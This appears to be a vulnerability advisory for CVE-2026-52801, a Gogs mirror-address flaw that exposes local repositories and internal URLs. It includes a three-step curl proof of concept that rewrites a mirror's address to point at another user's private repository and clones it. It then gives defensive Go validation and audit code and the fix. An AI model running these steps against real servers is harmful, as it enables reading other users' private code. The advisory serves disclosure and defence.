CVE-2026-52801: Gogs Mirror Settings SSRF and Local Repository Import
Any authenticated Gogs user can bypass the protection on the New Migration feature by updating a mirrored repository's address to a local filesystem path or internal URL, letting them read any repo th

The problem
Gogs's New Migration flow validates the clone address and blocks local paths. The Mirror Settings update path (the SaveAddress handler) skips that same check entirely.
Any authenticated user who owns or administers a mirrored repo can overwrite the mirror address with an arbitrary value. On the next sync, Gogs runs git fetch against whatever address was saved, including local paths like /home/git/repositories/victim/secret.git or internal http:// addresses.

Proof of concept
# Step 1: create a normal mirror from any reachable remote
curl -X POST 'http://gogs.example.com/api/v1/repos/migrate' \
-H 'Authorization: token <YOUR_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{"clone_addr":"https://github.com/any/public-repo","uid":1,"repo_name":"loot","mirror":true}'
# Step 2: overwrite the mirror address with a local repo path
# (POST to the Mirror Settings form under /<user>/<repo>/settings/mirror)
curl -X POST 'http://gogs.example.com/<user>/loot/settings/mirror' \
-H 'Authorization: token <YOUR_TOKEN>' \
-d 'action=mirror&interval=10m&address=/home/git/repositories/victim/private.git'
# Step 3: trigger an immediate sync
curl -X POST 'http://gogs.example.com/<user>/loot/settings/mirror' \
-H 'Authorization: token <YOUR_TOKEN>' \
-d 'action=sync'
# Result: Gogs clones /home/git/repositories/victim/private.git into the
# attacker-owned repo, exposing all commits and files via the normal web UI.

The root cause is a missing call to the same address-validation logic that protects New Migration. The patch (PR #8225, commit 11e19f28) adds that validation to the SaveAddress handler so local paths and blocked network ranges are rejected before being persisted.
Without the check, git is invoked with attacker-controlled input and happily fetches from file:// or local paths, bypassing all access controls at the application layer. The CVSS score (8.1) reflects high confidentiality and availability impact because an attacker can read any repo the git OS user owns, and a bad path can also cause the mirror worker to hang (CWE-20).
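As an added illustration, not Gogs's own code and not the patch from PR #8225, the Go sketch below shows the kind of address validation a SaveAddress handler needs before persisting a mirror address, plus a small audit helper a defender can run over existing mirrors. Assumptions made here: the scheme allowlist, the blocked IP ranges and the regular expression for local paths are this example's own choices; the audit helper assumes a mirror's fetch address is the remote.origin.url in the bare repository's git config (where Gogs keeps it), stated as an assumption rather than verified against 0.14.3; the sample config is constructed.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"regexp"
	"strings"
)

// Schemes a mirror may use (example choice); file:// and bare paths are never valid.
var allowedSchemes = map[string]bool{"http": true, "https": true, "git": true, "ssh": true}

// Absolute, relative, home-directory and Windows drive-letter paths, rejected before URL parsing.
var looksLikeLocalPath = regexp.MustCompile(`^(?:[/\\.~]|[A-Za-z]:[/\\])`)

// Ranges a mirror must never point at (example choice): loopback, RFC 1918, link-local, ULA.
var blockedNets = mustCIDRs("127.0.0.0/8", "::1/128", "0.0.0.0/8", "10.0.0.0/8",
	"172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "fe80::/10", "fc00::/7")

func mustCIDRs(cidrs ...string) []*net.IPNet {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

// Resolver maps a hostname to its IPs; injected so the check can run offline in tests.
type Resolver func(host string) ([]net.IP, error)

// ValidateMirrorAddress accepts only a URL with an allowed scheme and a host whose
// literal or resolved IPs all fall outside blockedNets; anything else must not be saved.
func ValidateMirrorAddress(addr string, resolve Resolver) error {
	addr = strings.TrimSpace(addr)
	if looksLikeLocalPath.MatchString(addr) {
		return fmt.Errorf("local filesystem path rejected: %q", addr)
	}
	u, err := url.Parse(addr)
	if err != nil {
		return fmt.Errorf("unparseable address: %w", err)
	}
	if !allowedSchemes[strings.ToLower(u.Scheme)] {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname()
	if host == "" {
		return fmt.Errorf("address has no host")
	}
	ips := []net.IP{}
	if ip := net.ParseIP(host); ip != nil {
		ips = append(ips, ip)
	} else if ips, err = resolve(host); err != nil {
		return fmt.Errorf("cannot resolve %q: %w", host, err)
	}
	for _, ip := range ips {
		for _, n := range blockedNets {
			if n.Contains(ip) {
				return fmt.Errorf("host %q resolves to blocked range %s", host, n)
			}
		}
	}
	return nil
}

// OriginURLFromGitConfig pulls remote.origin.url out of git config text. Assumption:
// a mirror fetches from its bare repo's origin remote, so this is what the next sync uses.
func OriginURLFromGitConfig(config string) (string, bool) {
	inOrigin := false
	for _, line := range strings.Split(config, "\n") {
		line = strings.TrimSpace(line)
		if strings.HasPrefix(line, "[") {
			inOrigin = line == `[remote "origin"]`
			continue
		}
		if inOrigin && strings.HasPrefix(line, "url") {
			if i := strings.Index(line, "="); i >= 0 {
				return strings.TrimSpace(line[i+1:]), true
			}
		}
	}
	return "", false
}

func main() {
	// Constructed sample: a bare repo config after an unpatched form accepted a local path.
	const sample = "[core]\n\tbare = true\n[remote \"origin\"]\n\turl = /home/git/repositories/victim/private.git\n\tfetch = +refs/*:refs/*\n"
	live := func(host string) ([]net.IP, error) { return net.LookupIP(host) }
	if u, ok := OriginURLFromGitConfig(sample); ok {
		fmt.Printf("%-50s -> %v\n", u, ValidateMirrorAddress(u, live))
	}
	for _, a := range []string{"https://github.com/any/public-repo", "file:///home/git/repositories/victim/private.git", "http://127.0.0.1:3000/victim/private.git"} {
		fmt.Printf("%-50s -> %v\n", a, ValidateMirrorAddress(a, live))
	}
}
```

Two caveats worth keeping in mind when adapting this. The check runs once at save time, so a hostname that resolves to a public address today and to an internal one at the next sync is not caught; re-validating immediately before each fetch closes that gap. The URL parser also rejects scp-style addresses such as git@host:path, which is a deliberate choice here, not something the page states about Gogs.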

The fix
Upgrade to Gogs 0.14.3. The fix is in PR #8225 (commit 11e19f28b5c82466fd1689c94344ef4313ee986c), which applies the same remote-address validation already present in New Migration to the Mirror Settings SaveAddress handler. If you cannot upgrade immediately, set ENABLE_LOCAL_PATH_MIGRATION = false in app.ini and restrict open registration (DISABLE_REGISTRATION = true) to reduce the attack surface.
Reported by wuhan005.